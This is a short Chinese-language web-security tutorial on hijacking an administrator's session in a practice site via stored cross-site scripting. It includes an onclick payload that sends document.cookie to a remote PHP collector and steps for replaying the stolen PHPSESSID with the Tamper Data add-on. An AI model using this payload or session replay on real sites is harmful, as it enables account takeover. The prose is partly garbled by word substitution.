文章目录
[+]
假设攻击者可以访问web运用程序,并且他想挟制利用同一运用程序的其他用户的会话。这种攻击的目标可能是得到对web运用程序的管理访问权,假设攻击者的访问帐户是有限的。
准备开始
(图片来自网络侵删)
<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>
上面的代码利用了JavaScript,它添加了一个带有onclick事宜的超链接。当不知情的用户单击该链接时,事宜将检索PHP cookie会话ID并将其连同URL中的会话ID一起发送到snatch_sess_id.php页面
输入如下所示的别的细节点击Save Changes
现在,你的仪表板将看起来像下面这样由于跨站点脚本代码存储在数据库中,以是每次有访问权限的用户登录时都会加载它让我们假设管理员登录并单击显示为Dark的超链接我们将得到一个显示在URL中的会话id的窗口把稳:脚本可以将值发送到存储PHPSESSID的远程做事器,然后用户重定向回网站,就像什么都没有发生一样。
利用Firefox和Tamper Data插件来仿照会话
下面的流程图显示了完成这个练习必须采纳的步骤。
你将须要Firefox web浏览器和Tamper Data插件来完成这部分打开Firefox并安装添加,如下图所示
搜索tamper data,然后单击安装,如上所示
点击Accept and Install…当安装完成时,单击Restart now如果菜单栏没有显示,请启用它
单击tools,然后选择tamper data,如下所示你将看到以下窗口。把稳:如果窗户不是空,点击clear按钮点击Start Tamper切换回Firefox web浏览器,输入http://www.techpanda.org/dashboard.php,然后按enter键加载页面你将从tamper data中得到以下弹出框弹出窗口有三个选项。Tamper选项许可你在将HTTP头信息提交给做事器之前修正它。点击它,你将看到以下窗口复制从攻击URL复制的PHP会话ID,并将其粘贴到等号后面。现在你的值该当是这样的PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
点击OK按钮你将再次看到tamper data弹出窗口取消Continue Tampering复选框完成后单击submit按钮,你该当能够看到如下所示的信息把稳:我们没有登录,我们利用利用跨站点脚本检索到的PHPSESSID值仿照了一个登录会话
希望通过这篇文章你们能够对网络渗透有一个初步理解。
关注我,阅读更多精彩好文
